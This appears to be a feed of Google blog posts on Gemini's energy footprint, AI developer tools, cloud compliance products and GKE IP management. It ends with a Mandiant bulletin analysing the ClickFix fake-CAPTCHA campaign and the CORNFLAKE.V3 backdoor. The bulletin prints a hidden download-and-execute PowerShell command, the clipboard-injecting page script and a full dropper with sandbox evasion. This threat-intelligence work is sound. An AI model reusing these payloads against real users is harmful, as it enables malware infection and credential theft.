AI is unlocking scientific breakthroughs, improving healthcare and education, and could add trillions to the global economy. Understanding AI’s footprint is crucial, yet thorough data on the energy and environmental impact of AI inference — the use of a trained AI model to make predictions or generate text or images — has been limited. And as more people use AI systems, the efficiency of inference matters more and more.
That’s why we’re releasing a technical paper detailing our comprehensive methodology for measuring the energy, emissions, and water impact of Gemini prompts. Using this methodology, we estimate the median Gemini Apps text prompt uses 0.24 watt-hours (Wh) of energy, emits 0.03 grams of carbon dioxide equivalent (gCO2e), and consumes 0.26 milliliters (or about five drops) of water¹ — figures that are substantially lower than many public estimates. The per-prompt energy impact is equivalent to watching TV for less than nine seconds.
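For intuition, the television comparison follows from simple arithmetic. Assuming a set that draws roughly 100 watts (an illustrative figure, not one taken from the paper):

$$\frac{0.24\ \text{Wh}}{100\ \text{W}} = 0.0024\ \text{h} \approx 8.6\ \text{s}$$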
At the same time, our AI systems are becoming more efficient through research innovations and software and hardware efficiency improvements. For example, over a recent 12-month period, the energy and total carbon footprint of the median Gemini Apps text prompt dropped by 33x and 44x, respectively, all while delivering higher quality responses. These results are built on our latest data center energy and emissions reductions and our work to advance carbon-free energy and water replenishment. While we’re proud of the innovation behind our efficiency gains so far, we’re committed to continuing substantial improvements. Here’s a closer look at these ongoing efforts.
Calculating the environmental footprint of AI at Google
Detailed measurement lets us compare across different AI models, and the hardware and energy they run on, while enabling system-wide efficiency optimizations — from hardware and data centers to the models themselves. By sharing our methodology, we hope to increase industry-wide consistency in calculating AI’s resource consumption and efficiency.
Measuring the footprint of AI serving workloads isn’t simple. We developed a comprehensive approach that considers the realities of serving AI at Google’s scale, which include:
Full system dynamic power: This includes not just the energy and water used by the primary AI model during active computation, but also the actual achieved chip utilization at production scale, which can be much lower than theoretical maximums.
Idle machines: To ensure high availability and reliability, production systems require a degree of provisioned capacity that is idle but ready to handle traffic spikes or failover at any given moment. The energy consumed by these idle chips must be factored into the total energy footprint.
CPU and RAM: AI model execution doesn’t happen solely in ML accelerators like TPUs and GPUs. The host CPU and RAM also play a crucial role in serving AI, and use energy.
Data center overhead: The energy consumed by the IT equipment running AI workloads is only part of the story. The infrastructure supporting these computations — cooling systems, power distribution, and other data center overhead — also consumes energy. Overhead energy efficiency is measured by a metric called Power Usage Effectiveness (PUE).
Data center water consumption: To reduce energy consumption and associated emissions, data centers often consume water for cooling. As we optimize our AI systems to be more energy-efficient, this naturally decreases their overall water consumption as well.
Many current AI energy consumption calculations only include active machine consumption, overlooking several of the critical factors discussed above. As a result, they represent theoretical efficiency instead of true operating efficiency at scale. When we apply this non-comprehensive methodology that only considers active TPU and GPU consumption, we estimate the median Gemini text prompt uses 0.10 Wh of energy, emits 0.02 gCO2e, and consumes 0.12 mL of water. This is an optimistic scenario at best and substantially underestimates the real operational footprint of AI.
Our comprehensive methodology’s estimates (0.24 Wh of energy, 0.03 gCO2e, 0.26 mL of water) account for all critical elements of serving AI globally. We believe this is the most complete view of AI’s overall footprint.
Our full-stack approach to AI — and AI efficiency
Gemini’s dramatic efficiency gains stem from Google’s full-stack approach to AI development — from custom hardware and highly efficient models, to the robust serving systems that make these models possible. We’ve built efficiency into every layer of AI, including:
More efficient model architectures: Gemini models are built on the Transformer model architecture developed by Google researchers, which provides a 10-100x efficiency boost over the previous state-of-the-art architectures for language modeling. We design models with inherently efficient structures like Mixture-of-Experts (MoE) and hybrid reasoning. MoE models, for example, allow us to activate only the small subset of a large model required to respond to a query, reducing computations and data transfer by a factor of 10-100 (a minimal routing sketch follows this list).
Efficient algorithms and quantization: We continuously refine the algorithms that power our models with methods like Accurate Quantized Training (AQT) to maximize efficiency and reduce energy consumption for serving, without compromising response quality.
Optimized inference and serving: We constantly improve AI model delivery for responsiveness and efficiency. Technologies like speculative decoding serve more responses with fewer chips by allowing a smaller model to make predictions that are then quickly verified by a larger model, which is more efficient than having the larger model make many sequential predictions on its own. Techniques like distillation create smaller, more efficient models (Gemini Flash and Flash-Lite) for serving that use our larger, more capable models as teachers. Faster machine learning hardware and models enable us to use more efficient larger batch sizes when handling requests, while still meeting our latency targets.
Custom-built hardware: We’ve been designing our TPUs from the ground up for over a decade to maximize performance per watt. We also co-design our AI models and TPUs, ensuring our software takes full advantage of our hardware — and that our hardware is able to efficiently run our future AI software when both are ready. Our latest-generation TPU, Ironwood, is 30x more energy-efficient than our first publicly-available TPU and far more power-efficient than general-purpose CPUs for inference.
Optimized idling: Our serving stack makes highly efficient use of CPUs and minimizes TPU idling by dynamically moving models based on demand in near-real-time, rather than using a “set it and forget it” approach.
ML software stack: Our XLA ML compiler, Pallas kernels, and Pathways systems enable model computations expressed in higher-level systems like JAX to run efficiently on our TPU serving hardware.
Ultra-efficient data centers: Google’s data centers are among the industry’s most efficient, operating at a fleet-wide average PUE of 1.09.
Responsible data center operations: We continue to add clean energy generation in pursuit of our 24/7 carbon-free ambition, while advancing our aim to replenish 120% of the freshwater we consume on average across our offices and data centers. We also optimize our cooling systems to balance the local trade-offs between energy, water, and emissions, conducting science-backed watershed health assessments to guide cooling-type selection and limit water use in high-stress locations.
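To make the Mixture-of-Experts point above concrete, here is a minimal sketch of top-k expert routing in Python/NumPy. It illustrates the general technique only; it is not Gemini's implementation, and every name, shape, and value below is invented for the example.

```python
import numpy as np

def moe_forward(x, router_w, experts_w, top_k=2):
    """Route each token to its top-k experts and combine their outputs.

    x:         (num_tokens, d_model) token activations
    router_w:  (d_model, num_experts) router projection
    experts_w: (num_experts, d_model, d_model) one weight matrix per expert
    """
    logits = x @ router_w                              # (tokens, experts)
    probs = np.exp(logits - logits.max(-1, keepdims=True))
    probs /= probs.sum(-1, keepdims=True)              # softmax gate
    top = np.argsort(-probs, axis=-1)[:, :top_k]       # chosen experts per token

    out = np.zeros_like(x)
    for t in range(x.shape[0]):
        for e in top[t]:
            # Only the selected experts run for this token, so compute scales
            # with top_k rather than with the total number of experts.
            out[t] += probs[t, e] * (x[t] @ experts_w[e])
    return out

# Tiny usage example with random weights: 4 tokens, 16 experts, 2 active each.
rng = np.random.default_rng(0)
x = rng.normal(size=(4, 8))
router_w = rng.normal(size=(8, 16))
experts_w = rng.normal(size=(16, 8, 8))
print(moe_forward(x, router_w, experts_w).shape)  # (4, 8)
```

Because only two of the sixteen experts run per token here, per-token compute stays roughly flat as the total expert count (and therefore model capacity) grows, which is the efficiency property described in the list above.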
Our commitment to efficient AI
Gemini’s efficiency gains are the result of years of work, but this is just the beginning. Recognizing that AI demand is growing, we’re heavily investing in reducing the power provisioning costs and water required per prompt. By sharing our findings and methodology, we aim to drive industry-wide progress toward more efficient AI. This is essential for responsible AI development.
1. A point-in-time analysis quantified the energy consumed per median Gemini App text-generation prompt, considering data from May 2025. Emissions per prompt were estimated based on energy per prompt, applying Google’s 2024 average fleetwide grid carbon intensity. Water consumption per prompt was estimated based on energy per prompt, applying Google’s 2024 average fleetwide water usage effectiveness. These findings do not represent the specific environmental impact of all Gemini App text-generation prompts, nor are they indicative of future performance.
2. The results of the above analysis from May 2025 were compared to baseline data from the median Gemini App text-generation prompt in May 2024. Energy per median prompt is subject to change as new models are added, AI model architecture evolves, and AI chatbot user behavior develops. The data and claims have not been verified by an independent third party.
Do you remember packing for an extended trip twenty years ago? We had to load up a camera, a day planner, a pile of books, a handheld gaming device, a map-stuffed tourist guide, a phone, a CD player, and maybe some cashier’s checks. Now? Just remember your smartphone!
This is an example of consolidation, but sometimes diversification happens. For example, it wasn’t long ago that your “computer” was simply a desktop PC that was your one device for everything. Now, we have laptops for portable work, tablets for casual digital consumption, smartphones for on-the-go internet, smart TVs for watching every type of content, and a myriad of gaming consoles.
This dynamic reminds me of the current state of developer tooling. Until recently, it was fairly static — UX design tools for mock-ups, IDEs to write code, build systems to assemble artifacts, systems and shell scripting to get infrastructure and apps deployed. It’s become wildly more diverse and dynamic thanks to generative AI. What we do, and what we use, will never be the same.
So when do I use what? Google alone offers LLM interfaces like the Gemini app and Google AI Studio, IDE extensions like Gemini Code Assist, browser-based dev environments like Firebase Studio, along with agentic services like Jules and the Gemini CLI. It’s easy to feel overwhelmed. Let’s break it down.
This diversification of tools is due, in part, to the new ways AI can assist us in software engineering.
We now have delegated, agentic options. Think of outsourcing the work to a third party where you provide detailed instructions, and only have limited interactions until the work is complete. The goal here is to get the work done quickly, and you aren’t focused on growing your own knowledge.
The next category is supervised, where you have AI acting more like someone who works for you. It’s more interactive, but you’re scaling by providing experience-based intent to an AI agent.
The final category is collaborative. Here, we’re in a conversational interaction with an AI assistant, going back and forth as we “learn” together.
Key takeaways for each AI developer tool
Jules is best for explicit instructions that can drive unattended batch work—add documentation, improve test coverage, perform surgical code modernizations—against source code in GitHub.com
No infrastructure or machinery to manage and update
Iterate with Jules on a plan before sending it off to do work
Get back a set of changes and a pull request to accept them
The Gemini CLI offers an open, fast, and flexible interface for working with code and content interactively or through delegation
Lightweight CLI tool that only requires a local install of Node
Many extensibility points including built-in tools along with support for MCP
Built into other tools like Gemini Code Assist and Firebase Studio
The open source Gemini CLI GitHub Actions are ideal for delegating background work to code repos—issue triage, pull request review—through async or user-initiated triggers
Comes with generous free usage limits for premier Gemini models. It supports enterprise access through Vertex AI models and also works with your Gemini Code Assist license.
Gemini Code Assist provides a rich IDE extension for conversational or agentic interactions with a codebase
Plug-in for Visual Studio Code and JetBrains IDEs
Offers code completion, test generation, code explanation, and code generation
Extensibility through custom commands, tools support, and code customization on private codebases. Agent mode is powered by the Gemini CLI and enables more complex interactions
Free tier along with per-user-per-month pricing for teams
Firebase Studio is the right choice when you want to build professional-grade software without the need to be a professional developer, while working in a Google-managed and browser-based dev environment
Built-in templates for popular frameworks and languages to start your project
Let Gemini vibe code your app or dive into the code thanks to the full power of an underlying customizable VM
Configure the workspace environment using Nix
No cost during preview, and more environments available for those who sign up for the Google Developer Program
Google AI Studio delivers the best way to interact with Google’s latest models, experiment with prompts, and vibe code lightweight web apps
Generate media, use the Live API for interactive sessions, and write prompts against Gemini and Gemma models
Write prompts, use tools, ground with Google Search, and run comparisons
Get API keys to call Gemini models programmatically
Generous free tier along with a paid tier offering higher rate limits, more features, and different data handling
Cheatsheet:
Choose the Gemini app for quick app prototyping.
Choose Google AI Studio for prompt experimentation with specific models and capabilities.
Choose Gemini Code Assist for AI-assisted software development in your environment, with your preferred toolchain.
Choose Firebase Studio when you want to come to a fully Google-managed environment to prototype or vibe code beautiful software without needing to be a full-time software developer.
Choose the Gemini CLI when you’re working with a wide array of generative AI projects and want the speed and portability of an agentic CLI. And choose the Gemini CLI GitHub Actions when you want to use Google Cloud security and models while triggering interactive or background tasks for GitHub-based projects.
Choose Jules when you’ve got GitHub-based projects that need changes that can be clearly articulated in a set of instructions.
I haven’t seen software development tools change this much—or such an eager willingness to try anything new—at any time in my career. It’s exciting and confusing. It’s important to see these tools as complementary, and you’ll likely use a mix to accomplish your tasks. At Google, we’re going to continue to focus on giving you the best AI tools to build the best AI apps. Let us know how to make both experiences better!
As organizations increase their focus on security and regulatory compliance, Google Cloud is helping our customers meet these obligations by fostering better collaboration between security and compliance teams, and the wider organization they serve.
To help simplify and enhance how organizations manage security, privacy, and compliance in the cloud, we’re thrilled to announce that Google Cloud Compliance Manager is now available in preview. Integrated into Security Command Center, this new capability provides a unified platform for configuring, monitoring, and auditing security and compliance across your infrastructure, workloads, and data.
Our AI-powered approach to supporting security and compliance obligations automates monitoring, detection, and reporting, and can help reduce manual effort while improving accuracy.
The bidirectional ability to translate regulatory controls into service level configurations or technical controls, and technical controls into policies, is essential for mitigating IT risks and streamlining operations. The ability to understand and visualize this interrelation between regulations and technical guardrails can help organizations establish a unified perspective on security and compliance risks and their remediation.
Security and Compliance are interrelated.
Reducing risk with smarter compliance
Many organizations have security and compliance obligations that need to align with government, industry, and enterprise-specific requirements. Compliance Manager allows you to configure these obligations using simple yet customizable constructs, prevent misconfigurations, monitor drift, and generate evidence of conformance within the same product experience. It supports standard security and compliance benchmarks, while allowing for customization at multiple levels.
Compliance Manager is designed to address these industry needs by unifying the entire security and compliance journey into three phases: configure, monitor, and audit.
Configure: You can express and enforce your security, privacy, and compliance intent based on your needs and risk tolerance using Compliance Manager, which provides a comprehensive library of frameworks and cloud controls, addressing global security and compliance regulations across industries and sectors. You can deploy these in preventive, detective, and evidence generation modes at different granularities, including organization, folder, and projects. You can also customize standard frameworks, and create your own to meet specific organization policies and unique needs.
Monitor: To continuously monitor and generate reports against your intended posture, Compliance Manager provides near real-time visibility into your compliance status, enabling proactive identification and remediation of potential issues. You can view findings and risks, with customizable and downloadable reports.
Audit: Audit Manager helps you generate evidence of conformance to security, privacy, and compliance that can be used for internal and external audits. It can automate and simplify the audit process, help you assess workloads for compliance, gather required evidence, and provide comprehensive audit reports. The effectiveness of this audit evidence generation has been validated through our partnership with FedRAMP for the FedRAMP 20X initiative.
Core constructs: Frameworks and CloudControls
Compliance Manager introduces Frameworks and CloudControls as two new platform components to express security, privacy, and compliance intent.
Frameworks are collections of technical controls that can also be mapped to regulatory controls. A framework can represent the following:
Industry-defined security and compliance standards such as CIS, CSA-CCM, SOC2, ISO 27001, NIST-800-53, FedRAMP-High, PCI-DSS, GDPR.
Google Cloud-defined security, privacy, and compliance best practices, including for AI security, data security, and cloud security.
Customer-defined collection of technical policies and controls representing company or industry best practices.
CloudControls are platform-agnostic building blocks that encapsulate the business logic for configuration (preventative mode), checks (detective mode), and evidence collection (audit mode). These controls support settings and checks for multiple resources and attributes, and can be parameterized for deployment time customizations. Customers can also write their own custom cloud controls.
Compliance Manager comes with a library of Frameworks and Cloud Controls, and we plan to add more as customer needs evolve. You can customize these framework templates or compose your own by selecting Cloud Controls from the library. You can also create custom Cloud Controls, either manually or with help from Compliance Manager’s GenAI-based control authoring feature, for quick time to value.
How to get started
Compliance Manager can be accessed directly from the Compliance navigation link, located under Security in Google Cloud Console. Go to the Compliance Overview page to start using it.
Compliance Manager overview on Google Cloud Console.
We have more updates planned for Compliance Manager as we build out its robust capabilities. We value your input, and would love to incorporate your feedback into our product roadmap. You can contact us through your Google Cloud account team, or send us your feedback at compliance-manager-preview@google.com.
In the age of data democratization and generative AI, the way organizations handle data has changed dramatically. This evolution creates opportunities — and security risks. The challenge for security teams isn’t just about protecting data; it’s about scaling security and compliance to meet this new reality.
While traditional security controls are vital to risk mitigation, many data security posture management solutions lack the necessary capabilities that today’s organizations require. For example, an organization with AI workloads needs to make sure that sensitive data is not leaking into the training environment; that intellectual property such as models and weights are protected from exfiltration; and that all their models support “compliance explainability.”
There are four key concerns that organizations should understand for robust data security: where sensitive data resides, how it’s used, what controls can secure it, and the monitoring tools available to provide evidence for compliance. Our new Data Security Posture Management (DSPM) offering, now in preview, provides end-to-end governance for data security, privacy, and compliance.
DSPM capabilities include advanced data controls that match security, privacy, and compliance requirements and align with business needs. Available as part of Security Command Center, this Google Cloud-native solution can help reduce tooling complexity and provides a native platform experience.
DSPM starts with a data map that offers a birds-eye view of data across your Google Cloud environment, its sensitivity level, and its default security posture. Discovery helps you apply policies to monitor and secure your data, allowing curated controls to be matched to your sensitive data needs.
With Google Cloud DSPM, security and compliance teams can:
Discover data: DSPM provides comprehensive visibility into your data estate. It automatically discovers data assets across your Google Cloud environment and uses sensitivity labels from Sensitive Data Protection to help you understand what data you have and where it resides.
Assess risk: DSPM evaluates your current data security posture against Google Cloud’s recommended best practices, and can help identify potential vulnerabilities and misconfigurations.
Protect data: DSPM deploys data security frameworks by mapping security and compliance requirements to control policies, and can help you monitor them in near-real time.
Simplify compliance: DSPM can audit data against relevant compliance frameworks, help you pinpoint gaps, and generate detailed, evidence-backed compliance reports. DSPM can also help assess compliance with HIPAA, GDPR, and PCI DSS.
A visual overview of Google Cloud’s Data Security Posture Management solution.
How advanced DSPM controls help with security and compliance requirements
Security teams can get started by identifying sensitive data in their organization’s Google Cloud environment, and mapping desired security and compliance outcomes to specific data controls. To make this process easier, DSPM offers advanced controls, such as data access governance, flow governance, data protection, and data deletion controls to meet security and compliance outcomes.
Currently, these controls can be applied in detective mode on data boundaries, including organization, folder, and project. You can also use Google Cloud Sensitive Data Protection (SDP) to scan for specific types of sensitive data.
Applying advanced data controls to protect data.
Data access governance: Using the data access governance control, you can govern access to sensitive data and restrict access, in detective mode, to approved principals.
For example, an organization that needs governance around customer billing data can create a policy to allow only the fraud detection team to access sensitive customer billing information, and apply that control policy across sensitive data. Once applied, the policy will follow the data and surface any non-compliant access events.
Flow governance: Using the data flow control, you can restrict, in detective mode, how data is moved across country boundaries, helping ensure that sensitive customer data is not moved outside a country boundary. As an example, consider an organization with operations in a specific country that has a compliance requirement to not move customer data outside the country’s geographic boundary. With data flow governance, the organization can create a policy to only allow flow of data within that country, and apply that policy to sensitive data. Once applied, the control will surface any non-compliant read operations from outside the allowed geographic boundary.
Data protection: Data protection controls can help manage encryption key configuration, such as enforcing customer-managed encryption keys (CMEK). You can create a policy to enforce CMEK on the keys protecting sensitive data.
Data deletion: Using data deletion controls, you can manage the maximum duration that data will be retained. You can create a policy with an allowed maximum retention period and apply it to sensitive data.
Help shape the future of data security
We’re inviting security and compliance teams to be among the first to experience the power of Google Cloud DSPM. As part of the DSPM preview, organizations can:
Activate DSPM and begin evaluating its capabilities for specific business needs. For a detailed guide, please refer to the user guide.
Join the Technical Advisory Council and Customer Design Panels to provide valuable feedback that can influence DSPM development.
Work with Google Cloud experts to optimize their data security strategy and ensure a successful implementation.
For further questions, contact your Google Cloud account team, or send us your feedback at dspm-pm@google.com.
Managing IP addresses in Kubernetes can be a complex and daunting task — but a crucial one. In Google Kubernetes Engine (GKE), it’s important that you manage IP addresses effectively, given the resource-constrained IPv4 address space. Sub-optimal configurations can lead to:
IP inefficiency: Poor utilization of the limited IPv4 address space
Complexity: Significant administrative overhead to plan and allocate IP addresses
Errors: Increased risk of hitting IP_SPACE_EXHAUSTED errors, which halt cluster scaling and application deployments
To help, we are pleased to announce the public preview of a new feature designed to simplify IP address management (IPAM) and improve IP efficiency in your GKE clusters: GKE auto IPAM.
Simplified and efficient IP management
GKE auto IPAM simplifies IPAM by dynamically allocating and/or de-allocating IP address ranges for nodes and pods as your cluster grows. This eliminates the need for large, potentially wasteful, upfront IP reservations and manual intervention during cluster scaling.
Benefits of GKE auto IPAM
Optimize resource allocation and enhance IP efficiency: Start with smaller IP ranges and let auto IPAM seamlessly expand them as needed, helping to ensure efficient utilization of your valuable IPv4 address space.
Scale with confidence and prevent IP exhaustion: Minimize your chances of running out of IPs. Auto IPAM proactively manages and dynamically allocates / deallocates addresses as your cluster grows, making it easy to scale.
Reduce administrative overhead: Simplify IPAM management with automated allocation and configuration, freeing up valuable time for your team — no manual intervention required.
Enable demanding workloads: Support resource-intensive applications that require rapid scaling by ensuring sufficient IP capacity is dynamically available on demand for growth and performance.
Getting started
This feature is compatible with both new and existing clusters running GKE version 1.33 or later. Today, you can configure it with either the gcloud CLI or the API; Terraform and UI support is coming soon.
Updated cluster creation UI/UX
We’ve also overhauled the GKE cluster creation UI to make it simpler and more intuitive. The old interface buried critical IPAM settings deep in the cluster creation flow, making it difficult to discover, configure, and validate crucial network settings. Elevating IPAM and bringing it to the forefront provides a more intuitive and streamlined experience, so that you can easily and confidently define your network topology from the outset, for more robust and error-free cluster deployments.
IP address management made easy
GKE auto IPAM allows you to scale your clusters up and scale your clusters down on-demand, optimizing IP address resource allocation and reducing the administrative overhead of cluster operations. Try it today!
Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.
Introduction
Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.
While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:
UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.
UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.
This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518’s access-as-a-service operation as an entry vector into target environments.
The CORNFLAKE Family
CORNFLAKE.V3 is a backdoor that retrieves payloads via HTTP, observed in two variants written in JavaScript and PHP (the PHP Variant). Supported payload types include shell commands, executables, and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.
The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.
| Malware Family | CORNFLAKE | CORNFLAKE.V2 | CORNFLAKE.V3 |
| --- | --- | --- | --- |
| Language | C | JS | JS or PHP |
| Type | Downloader | Downloader | Backdoor |
| C2 Communication | TCP socket (XOR encoded) | HTTP (XOR encoded) | HTTP (XOR encoded) |
| Payload types | DLL | DLL, EXE, JS, BAT | DLL, EXE, JS, BAT, PS |
| Persistence | No | No | Registry Run key |
Table 1: Comparison of CORNFLAKE malware variants
Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle
Initial Lead
Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.
Mandiant observed that a PowerShell script was executed via the Run command using the Windows+R shortcut. Evidence of this activity was found in the HKEY_USERS\<User>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:
Name: a
Value: powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1
The RunMRU registry key stores the history of commands entered into the Windows Run (shortcut Windows+R) dialog box.
The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.
Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage
As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image. The webpage accomplished this with the following JavaScript code:
// An image with the reCAPTCHA logo is displayed on the webpage
<div class="c" id="j">
<img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png"
alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1";
// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");
The PowerShell command copied to the clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u, where $u indicates the UNIX epoch timestamp of the download.
As a result, the PowerShell process connects to the aforementioned IP address and port with URL path 1742214432 (UNIX epoch timestamp), as shown in the following HTTP GET request:
GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.]141:8080
Connection: Keep-Alive
The following PowerShell dropper script, similar to 1742214432, was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:
# Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
exit 0;
}
# Get memory info for evasion check.
$TotalMemoryGb =
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb =
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb
# Exit if total memory is low or calculated "used" memory is low (possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
exit 0
}
# Exit if computer name matches default pattern (possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
exit 0
}
# Pause execution briefly.
sleep 1
# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")
# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile
# Try block for file extraction using COM objects.
try {
$Shell = New-Object -ComObject Shell.Application
$ZIP = $Shell.NameSpace($ZipFile)
$Destination = $Shell.NameSpace($DestinationFolder)
# Copy/extract contents silently.
$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
exit 0
}
# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder,
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")
# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`"" -WindowStyle Hidden
The PowerShell dropper’s execution includes multiple steps:
Check if it is running inside a virtual machine and, if true, exit
Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip, write the file to %TEMP%\downloaded.zip and extract its contents to the directory %APPDATA%\node-v22.11.0-win-x64
Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%\node-v22.11.0-win-x64\node.exe -e “<base64_decoded_CORNFLAKE.v3>”
The PowerShell dropper’s anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system’s computer name matches the regular expression DESKTOP-S* or the target system’s manufacturer is QEMU.
As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip (MD5: e033f9800a5ba44b23b3026cf1c38c72). This archive contained the Node.js runtime environment, including its executable file node.exe, which was then extracted to %APPDATA%\node-v22.11.0-win-x64. The Node.js environment allows for the execution of JavaScript code outside of a web browser.
The extracted %APPDATA%\node-v22.11.0-win-x64\node.exe binary was then launched by PowerShell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.
Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:
Host and AD-based reconnaissance
Persistence via Registry Run key
Credential harvesting attempts via Kerberoasting
The following process tree was observed during the investigation:
explorer.exe
↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe
  -w h -c
  "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
  0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
↳ c:\users\<user>\appdata\roaming\node-v22.11.0-win-x64\node.exe
  -e "{CORNFLAKE.V3}"
↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe
  -c "{Initial check and System Information Collection}"
↳ C:\Windows\System32\ARP.EXE -a
↳ C:\Windows\System32\chcp.com 65001
↳ C:\Windows\System32\systeminfo.exe
↳ C:\Windows\System32\tasklist.exe /svc
↳ c:\windows\system32\cmd.exe /d /s /c "wmic process where
  processid=16004 get commandline"
↳ C:\Windows\System32\cmd.exe /d /s /c "{Kerberoasting}"
↳ c:\windows\system32\cmd.exe /d /s /c
  "{Active Directory Reconnaissance}"
↳ c:\windows\system32\cmd.exe /d /s /c "reg add
  {ChromeUpdater as Persistence}"
Analysis of CORNFLAKE.V3
The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.
When the script initially executes, a check verifies the command line arguments of the node.exe process. Because the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process with 1 as an additional argument, after which the initial node.exe process exits. When the child process runs, since it now has three arguments, it passes this initial check and executes the rest of the script.
This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.
Following this, the malware attempts to collect system information. The relevant code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync. It gathers the script’s version, user privilege level (System, Admin, User), standard systeminfo output, running tasks/services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive), and the ARP table (arp -a).
C2 Initialization
After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloop function. The script contains support for two separate lists, hosts and hostsIp, which are both used in the C2 communication logic. Initially, the mainloop function attempts to connect to a random host in the hosts list; however, if unable to do so, it will attempt to connect to a random IP address in the hostsIp list instead. Once a connection is successfully established, the main function is called.
